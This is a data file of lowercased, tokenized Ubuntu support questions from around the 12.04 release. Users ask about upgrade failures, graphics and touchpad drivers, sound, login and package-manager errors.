128167	unity3d does n't work on an acer aspire one xg5 with intel graphics	i have ubuntu 12.04 lts beta on an acer aspire one zg5 net book with a mobile intel 945 express chip-set family card . i 've installed ubuntu 11.04 last year two days before the release of 11.10 . right after i installed the kde plasma desktop , my graphics fell off a cliff . unity started putting me on 2d mode , gnome on classic , and on kde i had to use x render . months after searching for graphics problems i found out that when i went to `` details '' in system settings , the list for graphics showed none ! i tried searching for intel drivers , but that 's like searching for gold on a sidewalk . even when i do find some sort of driver , i ca n't find a way to use it . the additional drivers list would not help either . i have three other operating systems : windows 7 linux mint pinguy os those ones do n't have any problems with my card . i upgraded from 11.10 to 12.04 lts beta in hope of canonical including my card in their driver list , and again it did n't work . i 'd appreciate anyone 's word on this .
128177	why dpkg-reconfigure is trying to reconfigure packages which are not installed ?	i tried to run sudo dpkg-reconfigure -phigh -a but i got glib-networking-services is not installed and no info . i checked the package and it is not installed , but should it reconfigure the installed packages only ? why is it trying to reconfigure a package which is not installed ?
128180	vsftpd stopped working after update	i have just updated to ubuntu 12.04 lts from ubuntu server 11.10 , it updated my vsftpd install , and it seems that something has changed : / i use pam authentication , does anyone have any ideas what could have changed to cause this ? : when trying to connect to ftp is get this error : 500 oops : vsftpd : refusing to run with writable root inside chroot ( ) i tried googling it , and it said to add allow_writable_root=yes to the config file - however when i try this and try restarting vsftpd it cant restart ? : / due to the popularity of this question , here is how i actually fixed it : wget http : //http.us.debian.org/debian/pool/main/v/vsftpd/vsftpd_3.0.2-3_amd64.deb -o vsftpd.deb dpkg -i vsftpd.deb echo `` allow_writeable_chroot=yes '' > > /etc/vsftpd.conf service vsftpd reload and viola : )
128181	touchpad twitchy on an hp g62 with a synps/2 synaptics touchpad	i experience some problems with my touchpad on ubuntu 12.04 . everytime i tap/double tap the touchpad the cursor is moving around ( not static as should be ) ( for example if i want to close a window , i click on `` x '' button from touchpad , the cursor is moving and not always hit the `` x '' button ) . touchpad buttons left click , right click are working well , but tap not . did u guys experience the same problem ? how to fix it ? ps : on ubuntu 11.10 did n't had this issue using a hp g62 and touchpad model is `` synps/2 synaptics touchpad '' . if i use this code xinput -- list i got this : synps/2 synaptics touchpad id=12 [ slave pointer ( 2 ) ]
128182	upgrading from 11.10 to 12.04	i am total newbie in ubuntu.can i upgrade my ubuntu 11.10 to 12.04 without data losing ? thanks in advance .
128184	failed attempt to upgrade to 12.04 need to get old files	hey so i tried upgrading to the new 12.04 version . when i tried to reboot it up though , it went to the purple screen and hung there . i wanted to get my important documents off of my old ubuntu , so i switched over to windows and redownloaded the jump drive boot up . once in the trial version i can not find my files , only files that are on my windows section . is there any way to recover the files that were on my old ubuntu , its finals week and i really need a couple of them , and starting to freak out a bit that i will have to start all over on two semester long projects . any help i would appreciate , and so would my sleeping schedule . thanks so much .
128185	cant log in as user after upgrade	everything worked fine in 11.10 . upgraded today , got the low system resource error for my graphics card . completely uninstalled fglrx and reinstalled it . will now boot to login screen but wont let me log in as my user . guest logs in fine . i completely uninstalled fglrx again , but still had the same problem . since my video card is old i think fglrx is not supported for me . how do i get a generic driver installed ? in the terminal when i type startx i says it already is started on display 0 . any help would be great .
128192	install 12.04 alongside 11.04 , having a share /home , but i can not login into 12.04	i have 11.04 installed in my computer , and i decided to install 12.04 from cd in a new partition , but having only one /home partition shared by both systems . installation went ok , but when i enter my password the screen turns black and returns to the login screen half a second later . i can log in as guest . i can also login at the cmd prompt ( going to tty with alt+ctrl+f1 ) with my normal user credentials . when logged in as guest i can also install programs using my normal account password . linuxismyfriend had the same issue , and he answered the issue himself saying when i created my new user ( with the same name as the old one ) i got the correct home directory but wrong uid and gid . when i changed it to the correct values everything worked again ! i 'd like to do what linuxismyfriend did , but i do not how . my question is , what should i do to set the proper uid and gid in the 12.04 install ?
128198	battery-indicator does not work on 12.04	the battery-indicator only appears in the login screen . using 12.04 ubuntu 64 bit . it has always happened since i installed from a fresh install of 12.04 .
128203	12.04 boot-up loop	whenever most linux os tries to boot up , they loop on modprobe and/or when finding my usb keyboard and mouse ( both logitech ) . ubuntu 10.04 works perfectly ( and mandriva ) , but any higher than 10.04 , or any other linux os wo n't even go into live mode , or install . ( on linux mint 12 , boot-up gets terminated on signal 9 , then it loops on my 2 usb devices . ) i 've recently had some , and most luck with 12.04 . i tried a cd , and liveusb and get the same issue , while booting up into live mode , and after live mode is on ( i know it is running because it responds to my keystrokes ) , i just get the `` _ '' blinking in the top left corner . ( reason i know the iso , cd , and usb are all good , i booted my acer netbook up with them . ) i 've never had any of these issues until i got my new computer . is there an incompatibility with unix going on here ? board : asus p8h61-m le/csm processor : i5 2500 gpu : evga gtx 460 any help would be greatly appreciated . edit 1 : i 've asked on a bunch of different support forums , and getting no where . : /
128205	ubuntu 12.04 glibc bug	i just installed fresh ubuntu 12.04 i was succesfully compiled dosemu-1.4.0 , unfortunately did n't work ( it worked in ubuntu previous version ) . looking to the ~/.dosemu/boot.log i found this weird messages : mfs : dos_gen : path_to_ufs '/home/bambang/.dosemu/drives/c//command.com' mfs : dos_fs : build_ufs_path result is '/home/bambang/.dosemu/drives/c/commndd.com' notice that command.com is mangled to commndd.com , very strange . searching in google i found the same error : http : //sourceforge.net/tracker/index.php ? func=detail & aid=3440083 & group_id=49784 & atid=457447 a comment in above page suggest that the error is due to glibc which has been fixed here : http : //permalink.gmane.org/gmane.comp.lib.glibc.alpha/15674 ldd -- version on my computer shows : bambang @ pa-o1-20 : ~ $ ldd -- version ldd ( ubuntu eglibc 2.15-0ubuntu10 ) 2.15 copyright ( c ) 2012 free software foundation , inc . this is free software ; see the source for copying conditions . there is no warranty ; not even for merchantability or fitness for a particular purpose . written by roland mcgrath and ulrich drepper . bambang @ pa-o1-20 : ~ $ how do i upgrade the glibc version ? thank you .
128206	how to change key-bindings in firefox ?	firefox constantly keep moving platformhtmlbindings.xml when it upgrade . i want to replace it to support vi key-bindings . but i can not find it any more . sudo find / -name platformhtmlbindings.xml -o -name toolkit.jar -o -name omni.jar thanks for your help . edit : i finally found it . it 's called omni.ja now . this is my editing to platformhtmlbindings.xml : < binding id= '' browser '' > < handlers > < handler event= '' keypress '' key= '' `` modifiers= '' shift '' command= '' cmd_scrollpageup '' / > < handler event= '' keypress '' key= '' `` command= '' cmd_scrollpagedown '' / > < handler event= '' keypress '' key= '' k '' command= '' cmd_scrolllineup '' / > < handler event= '' keypress '' key= '' j '' command= '' cmd_scrolllinedown '' / > < handler event= '' keypress '' key= '' h '' command= '' cmd_scrollleft '' / > < handler event= '' keypress '' key= '' l '' command= '' cmd_scrollright '' / > after editing , i restart firefox , and clear the cache . chrome : //global/content/platformhtmlbindings.xml is correct . but the j/k/h/l shortcuts did n't work .
128207	reformatted my windows 7 install but forgot to get rid of my wubi install before i did so	now i have a wubi partition on my hdd that i ca n't remove via add/remove programs . would simply running the latest wubi install remove my existing wubi partition ?
128213	admin password authenticates to log in , but not to install apps or change user accounts	i just installed ubuntu 12.04 . then i changed my own user profile to not require a password and log me in automatically . what happened is , i 'm still asked for a password once the desktop diplays . once i 'm in , i find my password is not accepted when i 'm trying to install an application or make changes to user accounts . i 'm still listed as an administrator , so i figure something must have happened to my password . my question is , why is my password accepted for logging in as a user , but not to do administrator stuff ? it 's the same password , is n't it ? the one i set when i installed ubuntu . i tried resetting the password at the root shell prompt ( accessed via recovery mode ) , but i only get an error , with the result `` password unchanged '' . help ! is there something else i can do to avoid completely reinstalling ubuntu ?
128214	how can i stop gimp from opening truecrypt 's user 's guide pdf ?	i have recently installed truecrypt on ubuntu 11.10 . the first thing i wanted to do was open the user 's guide from the help menu . however , when i clicked that menu entry , the gimp image editor started opening and presented a dialogue to import/raster the pdf document . i first checked the mimeapps.list file in ~/.local/share/applications to check that pdf files were set to open in evince document viewer by default - they were . i solved my problem by using the locate command in the terminal to find the source file at /usr/share/truecrypt/doc/truecrypt user guide.pdf and open it directly from there . however , i would like to be able to open the user 's guide when needed easily from the help menu rather than using this inconvenient work-around . any suggestions ?
128218	ubuntu 12.04 freezing when idle for a while	after i upgraded from ubuntu 11.10 to ubuntu 12.04 , the os freezing when idle for a while . someone had this problem ?
128222	entire system freezing after pressing `` suspend ''	so i just installed ubuntu , and i love it . i do n't think it 's going to replace windows 7 for me , and it has a few problems that i 'm probably going to end up fixing when i figure out how to use wine , but it 's still awesome . my main problem now is that whenever i put ubuntu in to suspend , the entire thing freezes . the monitor is still on , but is only black , and there is no reaction to any buttons . while i do n't mind pressing shut down since ubuntu loads up rather fast in comparison to windows 7 , it can get annoying and inconvenient . thanks for any help !
128232	enable root login in ubuntu 12.04	i am using ubuntu 12.04 version . i have enabled root through terminal . but there is no display for root-login in login window .
128233	windows 7 and ubuntu 12.04 dual boot , grub not showing !	i 've installed ubuntu 12.04 alongside with windows 7 . everything is fine until i want to enter ubuntu . when i start my pc , after normal boot , there is no grub or os selection menu , and my system loads straight into windows 7 . any help would be very appreciated ! thanks !
128236	why wo n't sound converter ( or sound konverter , for that matter ) work ?	i 'm trying to convert from flac to .mp3 to add to sd card on phone , but everytime i try to convert with one of these highly recommended software center apps , the conversion fails .
128239	does ubuntu 12.04 support hot plugging	i have a motherboard that supports hot plugging and a power supply that also supports this . does ubuntu support doing a hard drive hot plugging ?
128242	early 2011 macbook pro 13 '' ubuntu does not boot	just a little info on my computer : i have the early 2011 macbook pro 13 '' with intel hd 3000 graphics . on my internal hdd , i have osx and a small partition of windows 7 that i dual boot with . i have an external hdd that i use for back ups . i partitioned my external hdd to install ubuntu 12.04 . i partitioned it correctly and ticked the install updates while installing ubuntu button . so it installs , downloads and installs all of the updates it thinks it needs . tells me to reboot , so it ejects the live disk , then it reboots . i installed refit , so it boots directly to this screen . i see my os x , windows and ubuntu partitions . i select boot to ubuntu , it brings up the penguin and then boots directly to windows . what am i doing wrong ?
128244	software center empty `` no usefulness from server '' `` no username in config file ''	i upgraded to 12.04 lts and ran software center while a few things were running , and crashed . ( 2 gb ram on a netbook . ) on reboot , ubuntu one interface would not find any programs , neither installed ( to run ) nor available for download . so i launched software center , which opens , but does nothing . i click `` close '' button and get a `` force quit ? '' box . so i quit . did research , learned to run software center from terminal : 2012-04-29 23:14:36,978 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file then tried the below without success : reinstallation of software center : sudo apt-get install -- reinstall software-center did n't work . found this in a post : remove the config file for software-center then log out and back in sudo rm -rf ~/.config/software-center did n't work . reinstalled software center with synaptic package manager . still no dice ! and i am a linux newbie , so i do n't know where the dickens that config file is . help appreciated .
128249	no recent files in gnome shell	i upgraded from an almost default install of 11.10 to 12.04 . all went well . i can boot into gnome shell . get activities overview , except that there are no recent files ! in 11.10 , i used to get recent files . what is missing ? how do i get the recent files back ?
128251	project hamster notifications missing on upgrade to 12.04	i have upgraded from an almost default 11.10 install to 12.04 . all went well and i can login , logout , etc . without any problem . one very interesting thing about the project hamster notifications , though . i have set hamster to remind after every 27 mins . i do not get these notifications . however , if there is no activity set , i see the notification . in 11.10 , i used to get both the notifications . what is wrong ? how do i set it right ? by the way , the notifications work quite well in unity . but in gnome , the problem continues .
128256	where do i put `` /usr/bin/egtouchd '' to run after x server is started ?	i have a netbook ( samsung n145 ) with an egalax touch screen . the egalax driver install recommends adding `` /usr/bin/egtouchd '' to /etc/gdm/default immediately prior to the exit statement . this does not start the daemon . btw : the driver installer puts it in rc.local and the instructions say to remove and place it as above . the daemon does not start from rc.local either .
128258	the desktop can not be created because its area is too large with ati card and dual monitors	i have two monitors ( 1920x1200 and 2550x1600 ) and ati card ( hd 4870x2 ) . i installed the ati drivers from additional drivers panel . unfortunately ulike in previous versions of ubuntu i am unable to set the proper resolutions for my two monitors . i get the message : the desktop can not be created because its area is too large . have you encountered this problem . what is the possible solution .
128260	ubuntu lags severely on log-in screen and wo n't go any further	i have just installed 12.04 lts alongside my windows 7 os . i restarted my computer and loaded ubuntu from the boot screen . the purple ubuntu screen shows and goes away and the log-in screen appears . however , the system seems to be really slow . mouse input is extremely lagged , although keyboard input is nominal . after i input my password , the system never logs in . the log in screen went away the first time i logged in , but it would n't do anything else , and all subsequent log-in attempts have resulted in nothing happening . in all accounts , the cursor would still move but was still very lagged . my system specs are as follows : operating system : windows 7 home premium 64-bit ( 6.1 , build 7601 ) service pack 1 ( 7601.win7sp1_gdr.120305-1505 ) language : english ( regional setting : english ) system manufacturer : dell inc. system model : inspiron m5030 bios : bios date : 01/09/10 15:17:22 ver : 08.00.10 processor : amd athlon ( tm ) ii p360 dual-core processor ( 2 cpus ) , ~2.3ghz memory : 4096mb ram available os memory : 3836mb ram windows dir : c : \windows directx version : directx 11 graphics card name : ati mobility radeon hd 4250 manufacturer : ati technologies inc. chip type : ati display adapter ( 0x9712 ) display memory : 1914 mb dedicated memory : 252 mb shared memory : 1661 mb current mode : 1920 x 1080 ( 32 bit ) ( 60hz )
128262	i ca n't upgrade from 12.04 beta2 to 12.04 final , neither install any lens	in both cases , after adding the repos ( for lens ) , and updating , when i try install them or to upgrade ubuntu i get a similar message : w : duplicate sources.list entry cdrom : //ubuntu 12.04 lts precise pangolin - release i386 ( 20120423 ) / precise/restricted i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20i386 % 20 ( 20120423 ) _dists_precise_restricted_binary-i386_packages ) w : you may want to run apt-get update to correct these problems e.g . from terminal : sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . w : duplicate sources.list entry cdrom : //ubuntu 12.04 lts precise pangolin - release i386 ( 20120423 ) / precise/main i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20i386 % 20 ( 20120423 ) _dists_precise_main_binary-i386_packages ) w : duplicate sources.list entry cdrom : //ubuntu 12.04 lts precise pangolin - release i386 ( 20120423 ) / precise/restricted i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20i386 % 20 ( 20120423 ) _dists_precise_restricted_binary-i386_packages ) w : duplicate sources.list entry cdrom : //ubuntu 12.04 lts precise pangolin - release i386 ( 20120423 ) / precise/main i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20i386 % 20 ( 20120423 ) _dists_precise_main_binary-i386_packages ) w : duplicate sources.list entry cdrom : //ubuntu 12.04 lts precise pangolin - release i386 ( 20120423 ) / precise/restricted i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20i386 % 20 ( 20120423 ) _dists_precise_restricted_binary-i386_packages ) w : duplicate sources.list entry cdrom : //ubuntu 12.04 lts precise pangolin - release i386 ( 20120423 ) / precise/main i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20i386 % 20 ( 20120423 ) _dists_precise_main_binary-i386_packages ) w : duplicate sources.list entry cdrom : //ubuntu 12.04 lts precise pangolin - release i386 ( 20120423 ) / precise/restricted i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20i386 % 20 ( 20120423 ) _dists_precise_restricted_binary-i386_packages ) w : duplicate sources.list entry cdrom : //ubuntu 12.04 lts precise pangolin - release i386 ( 20120423 ) / precise/main i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20i386 % 20 ( 20120423 ) _dists_precise_main_binary-i386_packages ) w : duplicate sources.list entry cdrom : //ubuntu 12.04 lts precise pangolin - release i386 ( 20120423 ) / precise/restricted i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20i386 % 20 ( 20120423 ) _dists_precise_restricted_binary-i386_packages ) w : duplicate sources.list entry cdrom : //ubuntu 12.04 lts precise pangolin - release i386 ( 20120423 ) / precise/main i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20i386 % 20 ( 20120423 ) _dists_precise_main_binary-i386_packages ) w : duplicate sources.list entry cdrom : //ubuntu 12.04 lts precise pangolin - release i386 ( 20120423 ) / precise/restricted i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20i386 % 20 ( 20120423 ) _dists_precise_restricted_binary-i386_packages ) w : you may want to run apt-get update to correct these problems it is like if it is nothing to upgrade , but when i try to upgrade from the update manager i get the message : failed to download repository information . and in the details i get : w : gpg error : h ttp : //packages.medibuntu.org precise inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey 2ebc26b60c5a2783 , w : failed to fetch h ttp : //ppa.launchpad.net/jfi/pidgin/ubuntu/dists/precise/main/source/sources 404 not found , w : failed to fetch h ttp : //ppa.launchpad.net/jfi/pidgin/ubuntu/dists/precise/main/binary-i386/packages 404 not found , w : failed to fetch h ttp : //ppa.launchpad.net/remi.rerolle/unity-lens-tomboy/ubuntu/dists/precise/main/source/sources 404 not found , w : failed to fetch h ttp : //ppa.launchpad.net/remi.rerolle/unity-lens-tomboy/ubuntu/dists/precise/main/binary-i386/packages 404 not found , w : failed to fetch h ttp : //ppa.launchpad.net/unity-team/hud/ubuntu/dists/precise/main/source/sources 404 not found , w : failed to fetch h ttp : //ppa.launchpad.net/unity-team/hud/ubuntu/dists/precise/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . i 'd appreciate any help . thank you !
128265	mouse pointer ( touchpad ) getting stuck often in 12.04	in my ubuntu 12.04 , my mouse pointer gets stuck often . i 'm talking about the touchpad and not the external mouse . the first thought would be to check whether we have given the option to lock the touchpad while typing . but , my pointer ( touchpad ) gets stuck simply often . the slightest of deductions i have been able to make is that this happens sometimes just after using the touchpad scrolling . can this problem be rectified or should it be reported as a bug ?
128269	wireless connection drops every 30 seconds on an asus eee pc with an atheros card	i just upgraded to ubuntu 12.04 , and my wireless connection disconnects every 30 seconds . i am using an asus eee pc with an atheros wireless card . i tried to find out how to solve this , so i gave up and rebooted my computer . now the touchpad does n't work . i tried to do a system restore , and it wo n't even start . the netbook goes straight to the login page . i 'm going to have to switch to another linux distro or use an older ubuntu distro , because this is not working . i am not a skilled computer programmer , so i do n't know what to do .
128271	excessive bass in 5.1 center channel	recently upgraded from ubuntu 11.10 to 12.04 and my sound is goofy , i do n't remember it sounding this off before the upgrade . i 've got some basic logitech z506 speakers hooked up to the analogue outs on the sound card and i 'm using the analogue 5.1 option on the default sound dialogue in system settings . it seems like there is way too much bass in the center channel and almost none coming thru the subwoofer for some reason . [ intel ] : hda-intel - hda intel hda intel at 0xf9df8000 irq 77 1 [ nvidia ] : hda-intel - hda nvidia hda nvidia at 0xfbbfc000 irq 34
128274	how to get rhythmbox working on mp3	click on an mp3 file that used to work , rhythmbox comes up and appears to be playing , but no audio comes from speakers or headphone jack . jumping forward on song sometimes produces a very brief spurt of the song . other players play the file if brought up in 'open with ' , e.g. , movie player . sound on computers is otherwise normal . the problem exists on two toshiba satellite laptops , one a 32 bit cpu and the other a 64 bit machine . both have clean ubuntu 12.04 32-bit installs with restricted extras and medibuntu . not sure if rhythmbox worked before the restricted extras and medibuntu were installed . apt-get update and apt-get upgrade made no difference . internet search reveals only one other user reporting similar problem . before i back it all up and reinstall 12.04 over again is there something else i should do to fix the problem ?
128275	why does n't ubuntu release `` official '' virtual machine images ?	on this site there are a lots of questions about setting up ubuntu on a virtual machine . that rouses a question : why does n't canonical release `` official '' virtual machine images for ubuntu ? in my opinion , the easiest way to try ubuntu ( as a windows user ) is to download a vmware image and run it . just a click , and it works : - ) . at present , you can find virtual machine images from internet forums , for example , i downloaded this : http : //www.trendsigma.net/vmware/ubuntu1104.html and it works great . but it would be more convenient - and secure - if some images were available on the official site . a torrent file would be enough , that would eliminate bandwidth problems .
128276	how to find out the name desktop manager package running on my ubuntu 12.04 ?	i had an issue with my mouse pointer ( touchpad ) getting stuck frequently . in order to report that as a bug , i wanted to know which package my mouse pointer comes under . i assumed that it will be in the desktop manager package . now the problem is , how can i know the package name of the desktop manager i 'm running ? or rather , how can i know which desktop manager i 'm running ?
128279	aptana studio 3 as plugin fails to startup on ubuntu 12.04	i have installed eclipse 3.7.2 via ppa and subsequently i have clicked on add new software and the link to 64bit aptana studio 3 . it found the plugin and installed it correctly . now when i startup the eclipse i get this error : an internal error has occurred . no more handlesnative code library failed to load . ( java.lang.unsatisfiedlinkerror : /home/xxx/.eclipse/org.eclipse.platform_3.7.0_155965261/plugins/com.aptana.swt.webkitbrowser.linux.x86_64_1.0.0.1295409059/os/linux/x86_64/libcefjni.so : libjpeg.so.62 : can not open shared object file : no such file or directory ) any idea please ? update : seems to be the java version : ! session 2012-04-30 07:48:06.985 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=i20110613-1736 java.version=1.7.0_04 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_gb command-line arguments : -os linux -ws gtk -arch x86_64 ! entry org.eclipse.osgi 4 0 2012-04-30 07:48:07.951 ! message application error ! stack 1 java.lang.unsatisfiedlinkerror : could not load swt library . reasons : no swt-gtk-3740 in java.library.path no swt-gtk in java.library.path ca n't load library : /home/xxx/.swt/lib/linux/x86_64/libswt-gtk-3740.so ca n't load library : /home/xxx/.swt/lib/linux/x86_64/libswt-gtk.so at org.eclipse.swt.internal.library.loadlibrary ( library.java:285 ) at org.eclipse.swt.internal.library.loadlibrary ( library.java:194 ) at org.eclipse.swt.internal.c. < clinit > ( c.java:21 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:63 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:54 ) at org.eclipse.swt.widgets.display. < clinit > ( display.java:132 ) at org.eclipse.ui.internal.workbench.createdisplay ( workbench.java:695 ) at org.eclipse.ui.platformui.createdisplay ( platformui.java:161 )
128280	ubuntu 12.04 login screen with ldap users , no `` other ... ''	we 've upgraded recently to ubuntu 12.04 desktop and have issue with the new login screen . when users are listed there is now no option for `` other ... '' allowing a username and a password to be entered . given our users are all living in ldap with uids well above 1000 , this means it is now impossible to login via the gui . to workaround we 've had to set the greeter-hide-users option to true in lightdm.conf . this works but means we have to enter the username every time . in 11.04 this was not necessary - `` other ... '' would allow first-time logging in and thereafter the login screen would throw up these ldap users , presumably using a `` recently used '' cache ? hopefully the answer is some obvious setting i 've missed . thanks !
128281	codeblocks package broken , how do i remove it so i can install software ?	i recently installed codeblocks and ever since my software center has stopped working , preventing me from installing or uninstalling other software . all this is caused by unmet dependencies , which i have tried fixing by using sudo apt-get -f install . it does n't work though , and this is shown : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : codeblocks suggested packages : libwxgtk2.8-dev wx-common codeblocks-contrib the following packages will be upgraded : codeblocks 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/1,646 kb of archives . after this operation , 897 kb disk space will be freed . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of codeblocks : codeblocks depends on libcodeblocks0 ( = 10.05-1 ) ; however : version of libcodeblocks0 on system is 10.05-2. codeblocks depends on codeblocks-common ( = 10.05-1 ) ; however : version of codeblocks-common on system is 10.05-2. dpkg : error processing codeblocks ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : codeblocks e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i would very much appreciate it if someone could help . thanks in advance !
128283	future xubuntu updates after the three year lts period ?	i started using ubuntu two years ago by installing the xubuntu 9.04 and then proceeded to install gnome and a selection of extra packages i needed . i am forced to migrate to a new version since 9.04 is no longer supported . i was planning on installing xubuntu 12.04 mainly for the lts feature thinking that it would be supported for 5 years much like the standard version . however xubuntu is only supported for 3 years . my questions : with standard ubuntu 12.04 , could one resort to a simpler / more traditional look than gnome unity ? if so will the rest of the installed packages and functionality remain usable and functional ? could one resort to installing xubuntu 12.04 instead and add extra packages from the repository as needed ? am i right in assuming that xubuntu 12.04 and ubuntu 12.04 share the same repository ? in which case : why/how is it said that xubuntu 12.04 has support for 3 years versus the 5 years support offered for ubuntu 12.04 ? could an xubuntu 12.04 installation continue upgrading from the 12.04 ( precise pangolin ) repositories with given that they ought to be around for 5 years to honour the commitment to standard ubuntu 12.04 ?
128285	brightness controls not working on a sony vaio vpcy2	the brightness control are not working on ubuntu 12.04 64-bit , sony vaio vpcy2 ( intel video card ) . i 've tried both ways fn+f5/f6 and from brightness/lock menu ( under settings ) - i can slide the brightness adjustment bar but nothing changes so it looks like the brightness controls are not working at all . anyone know if there is a workaround for this ?
128288	how to tell dash to look in specific folders for videos and music	i have 2 folders filled with videos and songs that reside in a second hard drive . how can i tell dash to look in those folders every time i am looking for videos or songs .
128309	how to use ubuntu server full screen in virtualbox ?	i have installed ubuntu server 12.4 in oracle virtual box , after completing installation , i cant use the ubuntu server in full screen , guest additions present in virtual box will work in ubuntu server .
128310	sound sometimes disappears , definitely when skype is installed	after i upgraded to xubuntu 12.04 from 11.10 , i noticed skype was uninstalled , so i reinstalled it with aptitude . now if i install skype i do n't have sound any more in my mp4 clips . if i uninstall skype i have sound again in my mp4 clips , unless i pause the clip and resume , then the sound is gone again . i tested this on parole and vlc . is there a fix or is it just a bug ?
128321	how do i write the armhf omap4 image to an sdcard ?	i 'm trying to write ubuntu_12.04_armhf_omap4 image on a sd card for the first time . after decompressing the image i get a raw file . does it need to be converted to .img file , or what else ?
128322	`` unable to create node : timed out '' error when creating node in maas	i am trying out the new maas tool on my laptop and have installed the maas server in a virtualbox vm . i want to try adding nodes so i created a couple of vms in virtualbox that boot from the network via pxe and exist on a 'host-only ' network with the maas server . when i go to the maas admin website i try to add the nodes by copying the mac address for each of the virtual machines but get the error message `` unable to create node : timed out '' . is maas trying to invoke the node via wake on lan ? is there someway to get it to work with virtual machines for testing purposes ?
128323	proposed updates on 10.10 ?	i am using 10.10 and i have recently enabled the proposed updates . i got a list of 20 something updates which i would like to install but i have a doubt . according to this post the answer says that these updates are meant for testing and get pushed into the normal updates within a weak or so.but now as the 10.10 support has ended it is highly unlikely that they might get pushed into the normal updates.so is it safe to install them ? ? ? p.s . one of the updates is a kernel update thats why im worried about it . my hardware info a more detailed one also my driver info from debian gnu/linux device driver check page note i do not want to upgrade to a newer version of ubuntu
128327	how do i get a pretty top bar ?	when opening the unity interface or when i press alt , the top bar looks very sleek and pretty , as opposed to it 's usual gradient misplacedness . is it possible to have it look pretty all the time ?
128332	shortcut for dash ( super ) does n't work correctly	i have this problem : when i push `` super '' the dash shows , but only on workspaces on which are some windows open , but if i push space in workspace which is empty , then the dash wo n't show . super+a , super+s , super+v etc . works , only super does not .
128333	can not change default save directory for gnome-screenshot	i just fresh installed ubuntu 12.04 but using my old 11.10 /home partition as the /home point for the 12.04 . ( update : in other words , the 12.04 applications should most likely use my old 11.10 application configurations . actually they are . ) weird thing is , i can not seemed to change the default saved directory for gnome-screenshot . i tried to change the saved location from ~/pictures to ~/pictures/screenshots at the first screenshot . but in the second screenshot , the saved directory is still ~/picture . here is the gconf.xml : petra @ petra-laptop : ~ $ cat .gconf/apps/gnome-screenshot/ % gconf.xml < ? xml version= '' 1.0 '' ? > < gconf > < entry name= '' last_save_directory '' mtime= '' 1335771751 '' type= '' string '' > < stringvalue > file : ///home/petra/pictures/screenshots < /stringvalue > < /entry > < entry name= '' border_effect '' mtime= '' 1335771746 '' type= '' string '' > < stringvalue > none < /stringvalue > < /entry > < entry name= '' delay '' mtime= '' 1335771746 '' type= '' int '' value= '' 0 '' / > < entry name= '' include_pointer '' mtime= '' 1335771746 '' type= '' bool '' value= '' false '' / > < entry name= '' include_border '' mtime= '' 1335771746 '' type= '' bool '' value= '' true '' / > < /gconf > the screenshot should use the last_save_directory , right ? ( update : the unix timestamp shows 1335771751 which means mon 30 apr 2012 02:42:31 pm wit gmt+7 few hours after i installed the 12.04 , so this should means the gnome-screenshot successfully wrote the gconf.xml file ) and i also tried changing it from the compizconfig setting manager , but also gives no luck . is there any other way to do it ? ( or should i report it to the launchpad ? i 've never done it before , though ) update : here 's the fstab petra @ petra-laptop : ~ $ cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=b7b72b03-f7e6-4665-a4cd-fa0df5b2a0cf / ext4 errors=remount-ro 0 1 # /home was on /dev/sda7 during installation uuid=6c4d7a04-1e5f-4514-98a9-3e37867b34e8 /home ext4 defaults 0 2 # swap was on /dev/sda6 during installation uuid=5ecd35ad-d3bf-482c-bdac-dc3eae31ee8e none swap sw 0 0 update : i just tried capturing few screenshot and saved it to other directories instead of ~/pictures/screenshots . apparently the gconf.xml was n't updated after the latest screenshots .
